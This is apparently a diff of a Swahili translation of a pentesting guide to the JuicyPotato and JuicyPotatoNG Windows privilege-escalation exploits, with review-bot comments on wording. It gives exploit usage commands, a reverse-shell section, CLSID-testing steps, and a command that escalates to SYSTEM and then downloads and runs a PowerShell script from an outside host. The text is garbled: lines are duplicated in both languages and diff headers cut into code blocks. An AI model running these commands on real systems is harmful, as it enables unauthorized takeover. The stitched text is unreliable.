Suluhisho halisi ni kulinda akaunti na programu nyeti ambazo zinaendesha chini ya akaunti za `* SERVICE`. Kusimamisha `DCOM` hakika kutazuia exploit hii lakini kunaweza kuwa na athari kubwa kwa OS ya msingi.
Suluhisho halisi ni kulinda akaunti nyeti na programu zinazofanya kazi chini ya akaunti za `* SERVICE`. Kuzuia `DCOM` kunaweza kuzuia kabisa exploit hii lakini kunaweza kuwa na athari kubwa kwa OS ya msingi.

From: [http://ohpe.it/juicy-potato/](http://ohpe.it/juicy-potato/)

## JuicyPotatoNG (2022+)

JuicyPotatoNG inarejelea mbinu ya JuicyPotato-style ya local privilege escalation kwenye Windows ya kisasa kwa kuunganisha:
- DCOM OXID resolution kwa local RPC server kwenye port iliyochaguliwa, ikiepuka listener ya zamani iliyowekwa 127.0.0.1:6666.
- SSPI hook ya kushika na kuiga uthibitisho wa SYSTEM unaoingia bila kuhitaji RpcImpersonateClient, ambayo pia inawezesha CreateProcessAsUser wakati SeAssignPrimaryTokenPrivilege peke yake ipo.
- Mbinu za kukidhi vizingiti vya uanzishaji vya DCOM (mf., sharti la zamani la INTERACTIVE-group wakati ukilenga PrintNotify / ActiveX Installer Service classes).
JuicyPotatoNG re-introduces a JuicyPotato-style local privilege escalation on modern Windows by combining:
- Urekebishaji wa DCOM OXID kwa server ya ndani ya RPC kwenye port iliyochaguliwa, ukiepuka listener ya zamani iliyokuwa hardcoded 127.0.0.1:6666.
- Hook ya SSPI ya kunasa na kufanya impersonate authentication ya SYSTEM inayokuja ndani bila kuhitaji RpcImpersonateClient, ambayo pia inawezesha CreateProcessAsUser wakati tu SeAssignPrimaryTokenPrivilege ipo.
- Mbinu za kuridhisha vizingiti vya activation vya DCOM (mfano, sharti la zamani la INTERACTIVE-group wakati unalenga madarasa ya PrintNotify / ActiveX Installer Service).

Important notes (evolving behavior across builds):
- Septemba 2022: Mbinu ya awali ilifanya kazi kwenye malengo ya Windows 10/11 na Server zilizoungwa mkono ikitumia “INTERACTIVE trick”.
- Januari 2023: Sasisho kutoka kwa waandishi: Microsoft baadaye ilizuia INTERACTIVE trick. CLSID tofauti ({A9819296-E5B3-4E67-8226-5E72CE9E1FB7}) inarejesha exploitation lakini tu kwenye Windows 11 / Server 2022 kulingana na chapisho lao.
Vidokezo muhimu (tabia zinazoendelea katika builds):
- September 2022: Initial technique worked on supported Windows 10/11 and Server targets using the “INTERACTIVE trick”.
- January 2023 update from the authors: Microsoft later blocked the INTERACTIVE trick. A different CLSID ({A9819296-E5B3-4E67-8226-5E72CE9E1FB7}) restores exploitation but only on Windows 11 / Server 2022 according to their post.

Matumizi ya msingi (bendera zaidi ziko kwenye msaada):
Basic usage (more flags in the help):
```
JuicyPotatoNG.exe -t * -p "C:\Windows\System32\cmd.exe" -a "/c whoami"
# Useful helpers:
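Review bot: "Important notes (evolving behavior across builds):" / "Vidokezo muhimu (tabia zinazoendelea katika builds):" and "Matumizi ya msingi (bendera zaidi ziko kwenye msaada):" / "Basic usage (more flags in the help):" are each present in both languages, and the dated bullets under them alternate as well ("Septemba 2022: …" beside "September 2022: …"); keep the whole block in one language. The two Swahili renderings of the SSPI‑hook bullet do not say the same thing: "wakati SeAssignPrimaryTokenPrivilege peke yake ipo" means the privilege is the only one present, whereas "wakati tu SeAssignPrimaryTokenPrivilege ipo" means only when it is present; since CreateProcessAsUser is the path that needs SeAssignPrimaryToken (see the "Process creation mode" bullets in the previous hunk), the first is the sense to keep. Likewise "Kusimamisha `DCOM` hakika kutazuia exploit hii" (will surely prevent) and "Kuzuia `DCOM` kunaweza kuzuia kabisa exploit hii" (may prevent) differ in strength; keep the one that matches the README being quoted.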
@ -103,11 +102,11 @@ JuicyPotatoNG.exe -t * -p "C:\Windows\System32\cmd.exe" -a "/c whoami"
#  -s  Scan for a COM port not filtered by Windows Defender Firewall
#  -i  Interactive console (only with CreateProcessAsUser)
```
Ikiwa unalenga Windows 10 1809 / Server 2019 ambapo JuicyPotato ya kawaida imepachikwa, pendelea mbadala zilizo kwenye sehemu ya juu (RoguePotato, PrintSpoofer, EfsPotato/GodPotato, etc.). NG inaweza kuwa ya mazingira kulingana na build na hali ya huduma.
If you’re targeting Windows 10 1809 / Server 2019 where classic JuicyPotato is patched, prefer the alternatives linked at the top (RoguePotato, PrintSpoofer, EfsPotato/GodPotato, etc.). NG may be situational depending on build and service state.

## Mifano

Kumbuka: Tembelea [this page](https://ohpe.it/juicy-potato/CLSID/) kwa orodha ya CLSIDs za kujaribu.
Kumbuka: Tembelea [this page](https://ohpe.it/juicy-potato/CLSID/) for a list of CLSIDs to try.

### Pata nc.exe reverse shell
```
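Review bot: "Kumbuka: Tembelea [this page](https://ohpe.it/juicy-potato/CLSID/) for a list of CLSIDs to try." switches from Swahili to English mid‑sentence; the sibling line "Kumbuka: Tembelea [this page](…) kwa orodha ya CLSIDs za kujaribu." is the complete Swahili version. In "Ikiwa unalenga Windows 10 1809 / Server 2019 ambapo JuicyPotato ya kawaida imepachikwa…", "imepachikwa" means attached or installed, not patched; "imerekebishwa" (or "imezibwa") conveys "patched", and the English twin "If you’re targeting Windows 10 1809 / Server 2019 where classic JuicyPotato is patched…" should not remain in the translated file.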
@ -126,25 +125,25 @@ c:\Users\Public>
```
.\jp.exe -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p c:\windows\system32\cmd.exe -a "/c powershell -ep bypass iex (New-Object Net.WebClient).DownloadString('http://10.10.14.3:8080/ipst.ps1')" -t *
```
### Anzisha CMD mpya (ikiwa una ufikiaji wa RDP)
### Anzisha CMD mpya (ikiwa una upatikanaji wa RDP)

.png>)

## Matatizo ya CLSID

Mara nyingi, CLSID chaguo-msingi ambayo JuicyPotato inatumia **haifanyi kazi** na exploit inashindwa. Kwa kawaida, inahitaji majaribio kadhaa ili kupata **CLSID inayofanya kazi**. Ili kupata orodha ya CLSID za kujaribu kwa mfumo wa uendeshaji maalum, tembelea ukurasa huu:
Mara nyingi, CLSID ya chaguo-msingi ambayo JuicyPotato inatumia **haifanyi kazi** na exploit inashindwa. Kwa kawaida, inahitaji majaribio kadhaa ili kupata **CLSID inayofanya kazi**. Ili kupata orodha ya CLSIDs za kujaribu kwa mfumo wa uendeshaji maalum, tembelea ukurasa huu:

- [https://ohpe.it/juicy-potato/CLSID/](https://ohpe.it/juicy-potato/CLSID/)

### **Kuangalia CLSIDs**
### **Kukagua CLSIDs**

Kwanza, utahitaji baadhi ya faili za programu mbali na juicypotato.exe.
Kwanza, utahitaji baadhi ya executables mbali na juicypotato.exe.

Pakua [Join-Object.ps1](https://github.com/ohpe/juicy-potato/blob/master/CLSID/utils/Join-Object.ps1) na uiload kwenye kikao chako cha PS, na pakua na uendeshe [GetCLSID.ps1](https://github.com/ohpe/juicy-potato/blob/master/CLSID/GetCLSID.ps1). Skripti hiyo itaunda orodha ya CLSID zinazowezekana za kujaribu.
Pakua [Join-Object.ps1](https://github.com/ohpe/juicy-potato/blob/master/CLSID/utils/Join-Object.ps1) na uilete kwenye kikao chako cha PS, kisha pakua na uendeshe [GetCLSID.ps1](https://github.com/ohpe/juicy-potato/blob/master/CLSID/GetCLSID.ps1). Skripti hiyo itaunda orodha ya CLSIDs zinazowezekana za kujaribu.

Kisha pakua [test_clsid.bat ](https://github.com/ohpe/juicy-potato/blob/master/Test/test_clsid.bat)(badilisha njia kwa orodha ya CLSID na kwa juicypotato executable) na uiiendeshe. Itaanza kujaribu kila CLSID, na **wakati nambari ya bandari inabadilika, itamaanisha kuwa CLSID ilifanya kazi**.
Kisha pakua [test_clsid.bat ](https://github.com/ohpe/juicy-potato/blob/master/Test/test_clsid.bat)(badilisha njia kwa orodha ya CLSID na kwa juicypotato executable) na uendeshe. Itaanza kujaribu kila CLSID, na **wanapobadilika nambari ya bandari, itamaanisha kuwa CLSID ilifanikiwa**.

**Angalia** CLSID zinazofanya kazi **ukitumia parameter -c**
**Angalia** CLSIDs zinazofanya kazi **ukitumia parameter -c**

## Marejeo

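Review bot: the link text "[test_clsid.bat ](https://github.com/ohpe/juicy-potato/blob/master/Test/test_clsid.bat)" has a trailing space inside the brackets on both sides of the diff, which renders as a visible gap before the link; drop it. In "wanapobadilika nambari ya bandari, itamaanisha kuwa CLSID ilifanikiwa" the concord "wanapobadilika" does not agree with "nambari"; "inapobadilika" is right, as in the sibling line "wakati nambari ya bandari inabadilika". "uiiendeshe" is a typo for "uiendeshe" (the sibling line has "uendeshe"). The lone line ".png>)" is the tail of an image reference that has been cut off; verify that the full image line is intact in the source file.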